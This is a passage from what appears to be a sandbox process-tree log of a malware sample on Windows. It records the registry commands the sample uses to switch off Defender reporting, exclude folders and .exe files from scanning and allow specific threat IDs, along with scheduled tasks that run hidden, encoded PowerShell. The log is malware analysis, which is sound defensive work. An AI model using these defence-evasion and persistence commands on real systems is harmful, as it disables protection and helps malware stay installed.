        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:5632
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:4392
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:3044
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gGvhKmIWC" /SC once /ST 00:42:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:5176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5004
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gGvhKmIWC"
        6⤵
        
        PID:5752
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gGvhKmIWC"
        6⤵
        
        PID:5352
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bkigDFRrkKahyaAEgB" /SC once /ST 03:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\TYtOlOG.exe\" Gv /ntsite_idfxK 385118 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:2028
- - C:\Users\Admin\Pictures\ePj0Q3IAwol0xi3TP0p4YL3U.exe
    "C:\Users\Admin\Pictures\ePj0Q3IAwol0xi3TP0p4YL3U.exe"
    3⤵
    - Executes dropped EXE
    PID:3504
  - - C:\Users\Admin\AppData\Local\Temp\7zS896F.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      PID:6100
    - - C:\Users\Admin\AppData\Local\Temp\7zS9258.tmp\Install.exe
        
        .\Install.exe /DDfBFdidvhHni "385118" /S
        5⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:1304
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:828
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:3184
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:4120
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:1124
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:2760
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:6056
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:3664
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:5136
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gEdoOJdNL" /SC once /ST 00:31:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:5380
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gEdoOJdNL"
        6⤵
        
        PID:4452
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gEdoOJdNL"
        6⤵
        
        PID:5872
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bkigDFRrkKahyaAEgB" /SC once /ST 03:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe\" Gv /DUsite_idJlz 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:5732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3376 -ip 3376
1⤵
PID:1640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5076 -ip 5076
1⤵
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5216 -ip 5216
1⤵
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6032 -ip 6032
1⤵
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6016 -ip 6016
1⤵
PID:6112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5004 -ip 5004
1⤵
PID:2312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2084 -ip 2084
1⤵
PID:5228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5840
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4640
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5220 -ip 5220
1⤵
PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4724 -ip 4724
1⤵
PID:5908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2368 -ip 2368
1⤵
PID:2760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4452 -ip 4452
1⤵
PID:5144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3564 -ip 3564
1⤵
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3708 -ip 3708
1⤵
PID:5608

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:6140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5656

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1268

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5148 -ip 5148
1⤵
PID:5012

C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe
C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\heEFQcHFnsMnkaH\LkufTTH.exe Gv /DUsite_idJlz 385118 /S
1⤵
PID:5324
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6080
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5132
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FkMZKwlyurpoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FkMZKwlyurpoC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KkyMxCHiU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KkyMxCHiU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kBSTQLPmGKYTJCAhkkR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wLfJQuAadbUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wLfJQuAadbUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpRaYhcvJOtU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpRaYhcvJOtU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZkSlxqOxvEFNINVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZkSlxqOxvEFNINVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IYOJNCZhaGnhdyWSM\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uapGLxaXCyhumuBW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uapGLxaXCyhumuBW\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FkMZKwlyurpoC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4916
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FkMZKwlyurpoC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FkMZKwlyurpoC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KkyMxCHiU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KkyMxCHiU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
